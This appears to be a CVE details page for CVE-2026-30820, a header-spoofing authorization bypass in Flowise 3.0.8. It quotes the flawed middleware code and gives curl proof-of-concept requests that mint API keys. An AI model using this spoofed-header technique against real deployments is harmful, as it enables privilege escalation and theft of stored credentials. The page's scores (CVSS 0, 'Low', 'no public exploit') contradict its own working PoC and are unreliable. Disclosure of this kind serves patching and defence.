What is CVE-2026-30820?

### Summary Flowise trusts any HTTP client that sets the header `x-request-from: internal`, allowing an authenticated tenant session to bypass all `/api/v1/**` authorization checks. With only a browser cookie, a low-privilege tenant can invoke internal administration endpoints (API key management, credential stores, custom function execution, etc.), effectively escalating privileges. ### Details The global middleware that guards `/api/v1` routes lives in `external/Flowise/packages/server/src/index.ts:214`. After filtering out the whitelist, the logic short-circuits on the spoofable header: ```javascript if (isWhitelisted) { next(); } else if (req.headers['x-request-from'] === 'internal') { verifyToken(req, res, next); } else { const { isValid } = await validateAPIKey(req); if (!isValid) return res.status(401).json({ error: 'Unauthorized Access' }); … // owner context stitched from API key } ``` Because the middle branch blindly calls verifyToken, any tenant that already has a UI session cookie is treated as an internal client simply by adding that header. No additional permission checks are performed before `next()` executes, so every downstream router under `/api/v1` becomes reachable. ### PoC 1. Log into Flowise 3.0.8 and capture cookies (e.g., `curl -c /tmp/flowise_cookies.txt … /api/v1/auth/login`). 2. Invoke an internal-only endpoint with the spoofed header: ```bash curl -sS -b /tmp/flowise_cookies.txt \ -H 'Content-Type: application/json' \ -H 'x-request-from: internal' \ -X POST http://127.0.0.1:3100/api/v1/apikey \ -d '{"keyName":"Bypass Demo"}' ``` The server returns HTTP 200 and the newly created key object. 3. Remove the header and retry: ```bash curl -sS -b /tmp/flowise_cookies.txt \ -H 'Content-Type: application/json' \ -X POST http://127.0.0.1:3100/api/v1/apikey \ -d '{"keyName":"Bypass Demo"}' ``` This yields {"error":"Unauthorized Access"}, confirming the header alone controls access. The same spoof grants access to other privileged routes like `/api/v1/credentials`, `/api/v1/tools`, `/api/v1/node-custom-function`, etc. ### Impact This is an authorization bypass / privilege escalation. Any authenticated tenant (even without API keys or elevated roles) can execute internal administration APIs solely from the browser, enabling actions such as minting new API keys, harvesting stored secrets, and, when combined with other flaws (e.g., Custom Function RCE), full system compromise. All self-hosted Flowise 3.0.8 deployments that rely on the default middleware are affected.

What is the severity of CVE-2026-30820?

CVE-2026-30820 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2026-30820?

No known public exploits are currently available for CVE-2026-30820.

Is there a patch available for CVE-2026-30820?

Yes, patches are available for CVE-2026-30820. Check the vendor advisories for update instructions.

CVE-2026-30820 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v30.0

CVSS v20.0

Priority Score0.0

EPSS Score0.0

None

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

0.0

CVSS

No

Exploit

Yes

Patch

Low Priority

no major risk factors

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

Flowise trusts any HTTP client that sets the header x-request-from: internal, allowing an authenticated tenant session to bypass all /api/v1/** authorization checks. With only a browser cookie, a low-privilege tenant can invoke internal administration endpoints (API key management, credential stores, custom function execution, etc.), effectively escalating privileges.

Details

The global middleware that guards /api/v1 routes lives in external/Flowise/packages/server/src/index.ts:214. After filtering out the whitelist, the logic short-circuits on the spoofable header:

if (isWhitelisted) {
    next();
} else if (req.headers['x-request-from'] === 'internal') {
    verifyToken(req, res, next);
} else {
    const { isValid } = await validateAPIKey(req);
    if (!isValid) return res.status(401).json({ error: 'Unauthorized Access' });
    … // owner context stitched from API key
}

Because the middle branch blindly calls verifyToken, any tenant that already has a UI session cookie is treated as an internal client simply by adding that header. No additional permission checks are performed before next() executes, so every downstream router under /api/v1 becomes reachable.

PoC

Log into Flowise 3.0.8 and capture cookies (e.g., curl -c /tmp/flowise_cookies.txt … /api/v1/auth/login).
Invoke an internal-only endpoint with the spoofed header:

    curl -sS -b /tmp/flowise_cookies.txt \
      -H 'Content-Type: application/json' \
      -H 'x-request-from: internal' \
      -X POST http://127.0.0.1:3100/api/v1/apikey \
      -d '{"keyName":"Bypass Demo"}'

The server returns HTTP 200 and the newly created key object.

3. Remove the header and retry:

    curl -sS -b /tmp/flowise_cookies.txt \
      -H 'Content-Type: application/json' \
      -X POST http://127.0.0.1:3100/api/v1/apikey \
      -d '{"keyName":"Bypass Demo"}'

This yields {"error":"Unauthorized Access"}, confirming the header alone controls access.

CVSS v3 Breakdown

Attack Vector:-

Attack Complexity:-

Privileges Required:-

User Interaction:-

Scope:-

Confidentiality:-

Integrity:-

Availability:-

Patch References

Github.com